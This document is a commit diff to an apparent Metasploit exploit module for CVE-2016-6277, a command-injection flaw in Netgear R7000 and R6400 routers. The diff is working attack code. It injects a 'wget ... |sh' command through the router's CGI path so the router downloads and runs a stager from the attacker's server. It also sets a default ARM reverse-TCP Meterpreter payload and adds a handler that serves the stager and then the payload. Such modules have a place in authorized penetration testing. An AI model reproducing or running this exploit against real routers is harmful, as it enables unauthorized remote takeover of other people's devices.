Convert ARCH_CMD to CmdStager

2017-03-01 02:09:50 -06:00 · 2017-03-01 02:09:50 -06:00 · 0f899fdb0b
parent 25b3cc685a
commit 0f899fdb0b
1 changed files with 33 additions and 27 deletions
--- a/modules/exploits/linux/http/netgear_r7000_cgibin_exec.rb
+++ b/modules/exploits/linux/http/netgear_r7000_cgibin_exec.rb
@ -6,9 +6,11 @@
 require 'msf/core'

 class MetasploitModule < Msf::Exploit::Remote
+
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
@ -18,11 +20,11 @@ class MetasploitModule < Msf::Exploit::Remote
        Netgear R7000 and R6400 router firmware version 1.0.7.2_1.1.93 and possibly earlier.
      },
      'License'              => MSF_LICENSE,
-      'Platform'             => 'unix',
+      'Platform'             => 'linux',
      'Author'               => ['thecarterb', 'Acew0rm'],
      'DefaultTarget'        => 0,
-      'Privileged'           => false,
-      'Arch'                 => [ARCH_CMD],
+      'Privileged'           => true,
+      'Arch'                 => ARCH_ARMLE,
      'Targets'              => [
        [ 'Automatic Target', { } ]
      ],
@ -35,19 +37,18 @@ class MetasploitModule < Msf::Exploit::Remote
          [ 'CVE', '2016-6277']
        ],
      'DisclosureDate' => 'Dec 06 2016',
-      'Payload'        =>
+      'DefaultOptions'  =>
        {
-          'Space'       => 1024,
-          'DisableNops' => true,
-          'BadChars'    => "\x20"
-        },
-      'DefaultOptions'  => { 'WfsDelay' => 10}
+          'PAYLOAD' => 'linux/armle/mettle_reverse_tcp'
+        }
    ))

    register_options(
      [
        Opt::RPORT(80)
      ], self.class)
+
+    deregister_options('URIPATH')
  end

  def scrape(text, start_trig, end_trig)
@ -80,24 +81,29 @@ class MetasploitModule < Msf::Exploit::Remote
  end

  def exploit
-    check
+    return if check == CheckCode::Safe

-    pe = payload.encoded
-    pe.to_s
-    pe.gsub!('{','')
-    pe.gsub!('}','')
-
-    #cmd = payload.encoded.unpack("C*").map{|c| "\\x%.2x" % c}.join
-    #str = "echo$IFS-ne$IFS\"#{cmd}\"|/bin/sh&"
-
-    print_status('Sending encoded command...')
-    vprint_status("Encoded command: #{pe}")
-    send_request_cgi({
-        'uri' => "/cgi-bin/;#{pe}",
-        'method' => 'GET'
- })
-
-    print_status('Giving the handler time to run...')
+    @cmdstager = generate_cmdstager(flavor: :wget).join(';')

+    send_request_cgi(
+      'method' => 'GET',
+      'uri'    => "/cgi-bin/;wget$IFS-O-$IFS'#{srvhost_addr}:#{srvport}'|sh"
+    )
  end
+
+  # Return CmdStager on first request, payload on second
+  def on_request_uri(cli, request)
+    if @cmdstager
+      send_response(cli, @cmdstager)
+      @cmdstager = nil
+    else
+      super
+    end
+  end
+
+  # XXX: This is the only way to force this resource
+  def resource_uri
+    '/'
+  end
+
 end